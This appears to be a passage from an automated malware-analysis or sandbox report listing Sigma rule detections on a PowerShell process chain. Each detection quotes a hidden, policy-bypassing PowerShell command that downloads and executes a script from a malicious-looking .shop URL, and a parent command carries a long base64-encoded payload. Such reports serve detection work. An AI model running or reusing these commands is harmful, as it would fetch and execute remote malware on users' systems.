HgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA
                              Sigma detected: Suspicious PowerShell Parameter Substring
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA
                              Sigma detected: Change PowerShell Policies to an Insecure Level
                              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA
                              Sigma detected: PowerShell Download Pattern
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA
                              Sigma detected: PowerShell Web Download
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGA
                              Sigma detected: Suspicious Execution of Powershell with Base64
                              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAGEAYwBKADcAZwBJAFAAbABXAHQAbwBTAGsAdABEADkANgBlAE0AYwBuAFgAaAB5AFoANQB5AHkARABFAHIAOQBqAFEAagBxAEoAagA4AE4AZQA0AGYAeABHAGkAegBOAHkARgBBAEUAZQBNAFoAVwAwADMAUwBaAFoAZwB2AFEAWQBqAG0AcgB0AFUAVwBMADcAawA3AFkAZABwADQATABsAE4AbwB4ADEAQwA4AFEAYgBmAE8AWQBvAFIAdgBXAHIAeABTAEsAQQBaADMAaQBpAFoAcgBNAHgATABkAGcAeABZAGIAYQBiAEcAMQBqAGsAMgB3AHcAVgBqAEUAYQB5AE4AbABCADQAeQAzAHkAWQAyAGUATwBMAEUARABSAEIASwBXAFUATgBmAGQAbgBsAFIATgAzAEUASAAxAGEAaABiAFcANQBQAEoAeQBYAEwAWgBsAFkAbwBJAHMAZgBGAGcAQwBmAG4AaQA1AGcAawBHADEAOQB2AHEAQwBtAEwARQBpAHUARQBMAGYAbQB4AHMARgBLAG8ANwBMAGkAYwBkAGUAOABBADUANwBWAGoAeQBTAEYAYwBvAGwASgA5AHIAZABOAE8AUABKAGYAVgBNADkAegBvAEEAWQBxAHUAdABaADYAcQBxAEQAWgBXAHIAMgB0AEEAegBuAEoAVQBhAEgAYQBKAGQAVwBaAHkAWQBmAG0AegBKAEoANAA1ADYAWgByAGcAcABzAEQAcwBDAHYASQB3AHMAYwBGAEEAbQA2AFYASABhAFQAaAA3AHUATABaAG8AbgBjAGwAQgBUAFkAbQBSAFEAcABYAFkAbgBEAFUAQwBiAG8AbQBWAFIATABiAHQAUwA5AHcAbgBmAFYASgBRAE4ASQBKAGcAbQBZAEcAcAB5AE8ARgBPAFoANgBmAFAARQBNAEIAUwA5AG8AZwBiAEgASAByAHcAZgBxAFMAUgBIADYATgBiAGEAOABmAEYAawBSAGcARwB5AGUAdgAwAHgAcQAxADEAVQBPAGgAVgA0AGgAUgA2AFgAMQBnADMAOQBrAFMANwBBAFQAWQBEAEgAaABlADMAdABIADYAQgBkAHIAVABDAEgAYwA2AE4AMgBhAGQAawBjAHUAeABoAHQAZQBvAFIAZQA2AGEAZgB6ADUAVQBEAG4AYgBnAE4AUQBLADkAcgBCAEsAMgBlAHUAZgA3AHIAcgBiAFgANQB6AEQAcAByADgAYgBUAEQATgBNAFkAYQBaAHoAcgBHADIAMwA3AHMAbgB6AFoATgBIAE4AVQBzAEgAYgB0AHgAVAB1ADAAagAxAFkASQBmAGIAWgBPAHIAcwA5AGwASgBxAE4AYwB5AFYAeABrAGkAMgBUAEgAVAB4AEIANQBaADcASgBBAE0AdwB5ADkAQgBsADUAUQBjAFcATgBBAGsAegA0AGQAUQBiAHAAdwBlAGgAMwB3AFEAWgBGAFIAMABkAEsARwBvAEoAbgAgAD0AIAAkAGYAQQBMAHMAZQANAAoAJAA1ADAAcwBEADQATgBzADMAbwBNADAAcgBQAEUAMwA0AFcASgBvAEQAQgA1AHQAeABnAEsATgBkADIAcABwAG0AOABVADMAVgBEADYAZwBuAHQAbgB1AFUAYQBCAGgAUgBLAEkAUgA2AEMAWQBNAHQAbQA5AGMAQQBQAFYAeQBlAGwASwBEADIASQBDAEEAZAA2AGQANABFAHMAUQBFAEUANwBBADAAegBpAHcAWQA5AGsAcgAwAFMATgA0AGgAMQB2AHkAeABRAFkAUQBpAEcAMABTAGMATgB3AFEATAByAE4AUQB0AFAAMgBTAEMAcwB2AHQAdwBrAGMARQAxAGkANABQAFIATQByAEcARwBnAGYAeQAxADMAegBVAGYANQBkADMAZgB6AE8AbQBNAE0ATwBLAFoAQgBLAEsAZABhAFMAMABVAFgAOQBWAFgAWABUADMAdABjADAATwBUAEMAUwBKAEoAbAA4AFoAdABYAGkAdgBTAHUAQgA0AFEAMAA0AEMAVwBRAFQAVAA1ADYAQQBqAFIAMgBNAHcAVwBvAFUATgBaAG4AYwBKAEoAbgBZAEkATgA4AEoAUQBPADcASwBoAHEAMgBaADcANwAwAGMANgBOAHoASABjAGoAbgBzADUAQwA
                              Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
                              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/5c85i3vbf.vdf'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc JABPAGUAQQA2AFoARwA5ADcAWgBEAGIANwBSAGgAaQBsAG0ARgA0ADkAWgBWADIAQgBuAG4AdQBDAHYAYgA2AFgAOQByAFcAZAAxAEIANgBFAGIANwBtADkAeAA5AHkAbwB2AFQAZABzAGsANwB4AFUASwBOAGwATQAwAEkAWABPAE8ANQBZAGYAVABUAHMAZgBOAEMAQgBCADEAVQBGAFQAdgBaADgAZAB4AGsAUgBDAGsAMgBCAGcAYgBGAHEAVwBKAEYAZwBkADUAaQBaADMAVgBQAFYANQB2AEMAMgBEADYAWgA3ADIANgBlAHQAMwBMADMAaABEAEIAdQBUAFIARQB4AGYAOQAwAGYAZgBiAFcAcgBSADUAVQA4AFYAVQBUAFUAaABpAFcAUABZAGUAeQBSADgAcQB6AHQAUwA0AFIAUQBHAEoARABXADIAcwBMAGkAcQB2AGcAbABTAEcAcQBJADEANQB2AE4ASwBWAEMAWAB5AFEAZgBTAHYAcQBPAG4AYQAwAEQAVgBrAGIAYQAzAEIAcQBUADIASABzADkAMABLAE8AdQAzAFgANABHAEMANgBSAHoAYgB1AFcAZgBZAEMAQQBHAFgASABVAFAATQBnAG8AQwBzAFIARgBvAHkAagB1AGYAdwBUAGwAYgB2AG0ANwBDAHcAMwBjAGgAUQBPAG8AcwB1AE0AYQB0AGMANQBDAHcAawBZAGMAZABaAG